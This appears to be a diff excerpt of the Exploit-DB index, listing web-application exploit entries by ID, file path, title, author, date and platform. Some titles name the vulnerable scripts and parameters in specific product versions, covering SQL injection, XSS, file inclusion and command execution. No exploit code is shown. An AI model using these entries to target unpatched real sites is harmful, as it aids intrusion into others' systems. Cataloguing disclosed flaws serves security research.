+32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java, +32575,exploits/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)",2008-11-08,G4N0K,webapps,php, +32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple, +32577,exploits/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",webapps,asp, +32579,exploits/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",webapps,jsp, +32580,exploits/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",webapps,asp, +32588,exploits/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Cross-Site Scripting",2008-11-17,d3v1l,webapps,php, +32589,exploits/php/webapps/32589.html,"Kimson CMS - 'id' Cross-Site Scripting",2008-11-18,md.r00t,webapps,php, +32592,exploits/php/webapps/32592.txt,"Easyedit CMS - 'subcategory.php?intSubCategoryID' SQL Injection",2008-11-19,d3v1l,webapps,php, +32593,exploits/php/webapps/32593.txt,"Easyedit CMS - 'page.php?intPageID' SQL Injection",2008-11-19,d3v1l,webapps,php, +32594,exploits/php/webapps/32594.txt,"Easyedit CMS - 'news.php?intPageID' SQL Injection",2008-11-19,d3v1l,webapps,php, +32595,exploits/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",webapps,php, +32597,exploits/php/webapps/32597.txt,"Pilot Group PG Roommate Finder Solution - SQL Injection",2008-11-23,ZoRLu,webapps,php, +32598,exploits/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,webapps,php, +32600,exploits/php/webapps/32600.txt,"AssoCIateD 1.4.4 - 'menu' Cross-Site Scripting",2008-11-27,"CWH Underground",webapps,php, +32601,exploits/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro - 'Keyword' Cross-Site Scripting",2008-11-29,"Charalambous Glafkos",webapps,asp, +32602,exploits/asp/webapps/32602.txt,"Ocean12 (Multiple Products) - 'Admin_ID' SQL Injection",2008-11-29,"Charalambous Glafkos",webapps,asp, +32603,exploits/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 - 'Email' SQL Injection",2008-11-29,"Charalambous Glafkos",webapps,asp, +32604,exploits/asp/webapps/32604.txt,"ParsBlogger - 'blog.asp' Cross-Site Scripting",2008-11-29,Pouya_Server,webapps,asp, +32605,exploits/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,webapps,php, +32606,exploits/php/webapps/32606.txt,"Basic-CMS - 'q' Cross-Site Scripting",2008-11-29,Pouya_Server,webapps,php, +32607,exploits/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2008-11-28,"Charalambous Glafkos",webapps,php, +32608,exploits/php/webapps/32608.txt,"RakhiSoftware Shopping Cart - PHPSESSID Cookie Manipulation Full Path Disclosure",2008-11-28,"Charalambous Glafkos",webapps,php, +32609,exploits/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,webapps,asp, +32610,exploits/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,asp, +32611,exploits/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,asp, +32612,exploits/php/webapps/32612.txt,"Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32613,exploits/php/webapps/32613.txt,"Softbiz Classifieds Script - '/advertisers/signinform.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32614,exploits/php/webapps/32614.txt,"Softbiz Classifieds Script - 'gallery.php?radio' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32615,exploits/php/webapps/32615.txt,"Softbiz Classifieds Script - 'lostpassword.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32616,exploits/php/webapps/32616.txt,"Softbiz Classifieds Script - '/admin/adminhome.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32617,exploits/php/webapps/32617.txt,"Softbiz Classifieds Script - '/admin/index.php?msg' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32619,exploits/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,webapps,ios,52789 +32620,exploits/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,webapps,ios,8080 +32622,exploits/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",webapps,php,80 +32623,exploits/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XML External Entity Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",webapps,multiple, +32624,exploits/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' SQL Injection",2008-12-01,Pouya_Server,webapps,php, +32625,exploits/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32626,exploits/asp/webapps/32626.txt,"ASP Forum Script - 'messages.asp?message_id' SQL Injection",2008-12-01,Pouya_Server,webapps,asp, +32627,exploits/php/webapps/32627.txt,"ASP Forum Script - 'new_message.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,php, +32628,exploits/asp/webapps/32628.txt,"ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,asp, +32629,exploits/asp/webapps/32629.txt,"ASP Forum Script - 'default.asp' Query String Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,asp, +32630,exploits/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,webapps,asp, +32631,exploits/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,webapps,multiple, +32632,exploits/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,webapps,php, +32633,exploits/php/webapps/32633.txt,"Z1Exchange 1.0 - 'id' SQL Injection",2008-12-02,Pouya_Server,webapps,php, +32634,exploits/php/webapps/32634.txt,"Z1Exchange 1.0 - 'id' Cross-Site Scripting",2008-12-02,Pouya_Server,webapps,php, +32635,exploits/asp/webapps/32635.txt,"Jbook - SQL Injection",2008-12-02,Pouya_Server,webapps,asp, +32636,exploits/php/webapps/32636.txt,"Orkut Clone - 'profile_social.php?id' SQL Injection",2008-12-02,d3b4g,webapps,php, +32637,exploits/php/webapps/32637.txt,"Orkut Clone - 'profile_social.php?id' Cross-Site Scripting",2008-12-02,d3b4g,webapps,php, +32638,exploits/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",webapps,php, +32639,exploits/php/webapps/32639.txt,"Yappa-ng - 'index.php?album' Cross-Site Scripting",2008-12-03,Pouya_Server,webapps,php, +32640,exploits/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,webapps,php, +32641,exploits/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,webapps,php, +32642,exploits/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",webapps,php, +32644,exploits/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",webapps,php,443 +32645,exploits/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Remote Command Execution",2008-12-06,"Troy Bollinge",webapps,php, +32646,exploits/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",webapps,php, +32647,exploits/php/webapps/32647.txt,"PrestaShop 1.1 - '/admin/login.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, +32648,exploits/php/webapps/32648.txt,"PrestaShop 1.1 - 'order.php?PATH_INFO' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, +32649,exploits/php/webapps/32649.txt,"PHPepperShop 1.4 - 'index.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, +32650,exploits/php/webapps/32650.txt,"PHPepperShop 1.4 - 'shop/kontakt.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, +32651,exploits/php/webapps/32651.txt,"PHPepperShop 1.4 - 'shop/Admin/shop_kunden_mgmt.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, +32652,exploits/php/webapps/32652.txt,"PHPepperShop 1.4 - 'shop/Admin/SHOP_KONFIGURATION.php' Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,webapps,php, +32653,exploits/asp/webapps/32653.txt,"Professional Download Assistant 0.1 - SQL Injection",2008-12-09,ZoRLu,webapps,asp, +32655,exploits/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products - 'logon_processing.jsp' SQL Injection",2008-12-11,"3d D3v!L",webapps,jsp, +32656,exploits/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injections",2008-12-01,"security curmudgeon",webapps,php, +32658,exploits/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' SQL Injection",2008-12-13,Pouya_Server,webapps,asp, +32660,exploits/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",webapps,asp, +32662,exploits/php/webapps/32662.py,"WebPhotoPro - Multiple SQL Injections",2008-12-14,baltazar,webapps,php, +32663,exploits/php/webapps/32663.txt,"Injader 2.1.1 - SQL Injection / HTML Injection",2008-12-15,anonymous,webapps,php, +32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,webapps,ios,8080 +32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778 +32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778 +32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",webapps,hardware,80 +32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",webapps,php, +32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,webapps,php, +32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",webapps,php, +32671,exploits/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Multiple SQL Injections",2008-12-18,"crash over",webapps,php, +32672,exploits/php/webapps/32672.txt,"Easysitenetwork Jokes Complete Website - 'joke.php' SQL Injection",2008-12-18,Ehsan_Hp200,webapps,php, +32676,exploits/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 - HTML Injection",2008-12-19,"Moritz Naumann",webapps,php, +32677,exploits/jsp/webapps/32677.txt,"Openfire 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",webapps,jsp, +32678,exploits/jsp/webapps/32678.txt,"Openfire 3.6.2 - 'user-properties.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",webapps,jsp, +32679,exploits/jsp/webapps/32679.txt,"Openfire 3.6.2 - 'log.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",webapps,jsp, +32680,exploits/jsp/webapps/32680.txt,"Openfire 3.6.2 - 'log.jsp' Directory Traversal",2009-01-08,"Federico Muttis",webapps,jsp, +32683,exploits/asp/webapps/32683.txt,"Mavi Emlak - 'newDetail.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",webapps,asp, +32685,exploits/php/webapps/32685.txt,"ViArt Shop 3.5 - 'manuals_search.php?manuals_search' Cross-Site Scripting",2008-12-29,"Xia Shing Zee",webapps,php, +32687,exploits/asp/webapps/32687.txt,"Madrese-Portal - 'haber.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",webapps,asp, +32689,exploits/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",webapps,php, +32698,exploits/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,webapps,php, +32701,exploits/php/webapps/32701.txt,"WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",webapps,php,80 +32703,exploits/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent",2014-04-05,Vulnerability-Lab,webapps,ios, +32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",webapps,jsp, +32709,exploits/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/Sys_DirAnzeige.jsp?Pfad' Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",webapps,jsp, +32710,exploits/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/auftrag_job.jsp?Pfad' Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",webapps,jsp, +32713,exploits/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,webapps,php, +32714,exploits/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injections",2009-01-12,"Joseph Giron",webapps,php, +32716,exploits/asp/webapps/32716.html,"Comersus Cart 6 - User Email and User Password Unauthorized Access",2009-01-12,ajann,webapps,asp, +32718,exploits/php/webapps/32718.txt,"Ovidentia 6.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",webapps,php, +32721,exploits/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,webapps,php, +32724,exploits/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,webapps,php, +32727,exploits/php/webapps/32727.txt,"MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection",2009-01-15,waraxe,webapps,php, +32728,exploits/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php?i' Cross-Site Scripting",2009-01-15,waraxe,webapps,php, +32729,exploits/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' SQL Injection",2009-01-15,Pouya_Server,webapps,asp, +32730,exploits/asp/webapps/32730.txt,"Active Bids - 'search' Cross-Site Scripting",2009-01-15,Pouya_Server,webapps,asp, +32731,exploits/asp/webapps/32731.txt,"Active Bids - 'search' SQL Injection",2009-01-15,Pouya_Server,webapps,asp, +32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,webapps,php, +32733,exploits/php/webapps/32733.txt,"w3bcms - '/admin/index.php' SQL Injection",2009-01-15,Pouya_Server,webapps,php, +32734,exploits/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",webapps,cgi, +32735,exploits/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,webapps,asp, +32736,exploits/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,webapps,asp, +32741,exploits/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",webapps,jsp, +32742,exploits/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'swr.jsp?q' Cross-Site Scripting",2009-01-20,"Red Hat",webapps,jsp, +32746,exploits/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,webapps,cgi, +32747,exploits/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' SQL Injection",2009-01-23,"Sina Yazdanmehr",webapps,php, +32748,exploits/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,webapps,asp, +32750,exploits/asp/webapps/32750.txt,"OBLOG - 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,webapps,asp, +32756,exploits/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",webapps,asp, +32757,exploits/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",webapps,php, +32758,exploits/asp/webapps/32758.txt,"Lootan - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",webapps,asp, +32759,exploits/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Local File Inclusion",2009-01-26,"Sarid Harper",webapps,php, +32760,exploits/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,webapps,php, +32765,exploits/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,webapps,multiple, +32766,exploits/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' Open Redirection",2009-01-28,buzzy,webapps,php, +32767,exploits/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",webapps,php, +32768,exploits/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,webapps,cgi, +32770,exploits/php/webapps/32770.txt,"E-PHP B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,webapps,php, +32773,exploits/php/webapps/32773.txt,"Simple Machines Forum (SMF) 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,webapps,php, +32777,exploits/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,webapps,php, +32779,exploits/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,webapps,php, +32782,exploits/php/webapps/32782.txt,"FotoWeb 6.0 - 'Login.fwx?s' Cross-Site Scripting",2009-02-09,"Stelios Tigkas",webapps,php, +32783,exploits/php/webapps/32783.txt,"FotoWeb 6.0 - 'Grid.fwx?search' Cross-Site Scripting",2009-02-09,"Stelios Tigkas",webapps,php, +32784,exploits/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",webapps,php, +32785,exploits/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,webapps,php, +33129,exploits/hardware/webapps/33129.html,"Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)",2014-04-30,"shyamkumar somana",webapps,hardware,80 +33198,exploits/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' Cross-Site Scripting",2009-07-27,Moudi,webapps,php, +32790,exploits/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",webapps,php,80 +32792,exploits/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",webapps,php,80 +32797,exploits/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injections",2009-02-10,"Francesco Bianchino",webapps,asp, +32802,exploits/php/webapps/32802.txt,"Clipbucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,webapps,php, +32803,exploits/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' SQL Injection",2008-10-01,r45c4l,webapps,php, +32804,exploits/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Remote File Inclusion",2009-02-20,Kacper,webapps,php, +32806,exploits/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,webapps,php, +32807,exploits/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",webapps,php, +32808,exploits/php/webapps/32808.txt,"Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",webapps,php, +32809,exploits/php/webapps/32809.txt,"Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",webapps,php, +32810,exploits/php/webapps/32810.txt,"Magento 1.2 - 'downloader/index.php' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",webapps,php, +32814,exploits/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection",2014-04-11,delme,webapps,php, +32816,exploits/php/webapps/32816.txt,"Orooj CMS - 'news.php' SQL Injection",2009-02-25,Cru3l.b0y,webapps,php, +32818,exploits/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",webapps,java, +32819,exploits/php/webapps/32819.txt,"Parsi PHP CMS 2.0 - 'index.php' SQL Injection",2009-02-26,Cru3l.b0y,webapps,php, +32821,exploits/java/webapps/32821.html,"APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting",2009-02-26,"Digital Security Research Group",webapps,java, +32823,exploits/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,webapps,php, +32827,exploits/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,webapps,php, +32828,exploits/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,webapps,php, +32830,exploits/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,webapps,php, +32831,exploits/php/webapps/32831.txt,"Microweber CMS 0.93 - Cross-Site Request Forgery",2014-04-13,sajith,webapps,php, +32833,exploits/asp/webapps/32833.txt,"Blogsa 1.0 - 'Widgets.aspx' Cross-Site Scripting",2009-03-02,DJR,webapps,asp, +32835,exploits/php/webapps/32835.txt,"Novaboard 1.0 - HTML Injection / Cross-Site Scripting",2009-03-03,"Jose Luis Zayas",webapps,php, +32840,exploits/php/webapps/32840.txt,"Amoot Web Directory - Password Field SQL Injection",2009-03-05,Pouya_Server,webapps,php, +32841,exploits/php/webapps/32841.txt,"CMSCart 1.04 - 'maindatafunctions.php' SQL Injection",2009-02-28,"John Martinelli",webapps,php, +32842,exploits/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",webapps,php, +32843,exploits/php/webapps/32843.txt,"TinXCMS 3.5 - 'rss.php' SQL Injection",2009-03-06,"Dmitriy Evteev",webapps,php, +32844,exploits/php/webapps/32844.txt,"PHORTAIL 1.2.1 - 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",webapps,php, +32846,exploits/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection",2009-03-10,x0r,webapps,php, +32852,exploits/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting",2009-03-12,iliz,webapps,php, +32853,exploits/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting",2009-03-12,iliz,webapps,php, +32854,exploits/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting",2009-03-12,iliz,webapps,php, +32887,exploits/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation",2009-04-02,laurent.desaulniers,webapps,php, +32858,exploits/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Cross-Site Scripting",2009-03-17,syniack,webapps,java, +32859,exploits/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass (1)",2014-04-14,"Yassin Aboukir",webapps,hardware, +32861,exploits/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",webapps,php, +32862,exploits/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",webapps,java, +32863,exploits/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",webapps,java, +32864,exploits/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting",2009-05-20,"SCS team",webapps,java, +32866,exploits/ios/webapps/32866.txt,"PDF Album 1.7 iOS - Local File Inclusion",2014-04-14,Vulnerability-Lab,webapps,ios, +32867,exploits/php/webapps/32867.txt,"WordPress Plugin Quick Page/Post Redirect 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",webapps,php,80 +32868,exploits/php/webapps/32868.txt,"WordPress Plugin Twitget 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",webapps,php,80 +32869,exploits/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection (Metasploit)",2014-04-14,Metasploit,webapps,linux,10080 +32870,exploits/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosures",2009-04-19,r0t,webapps,cgi, +32871,exploits/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",webapps,php, +32872,exploits/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,webapps,php, +32873,exploits/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,webapps,php, +32874,exploits/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,webapps,asp, +32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php, +32880,exploits/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,webapps,php, +32882,exploits/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",webapps,asp, +32883,exploits/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080 +32886,exploits/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",webapps,hardware,8080 +32888,exploits/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",webapps,asp, +32889,exploits/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,webapps,php, +32894,exploits/multiple/webapps/32894.txt,"IBM Bladecenter Advanced Management Module 1.42 - Login 'Username' Cross-Site Scripting",2009-04-09,"Henri Lindberg",webapps,multiple, +32895,exploits/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting",2009-04-09,"Henri Lindberg",webapps,multiple, +32896,exploits/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",webapps,multiple, +32897,exploits/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",webapps,java, +32898,exploits/asp/webapps/32898.txt,"Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",webapps,asp, +32903,exploits/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,webapps,asp, +32907,exploits/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - '/apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",webapps,cgi, 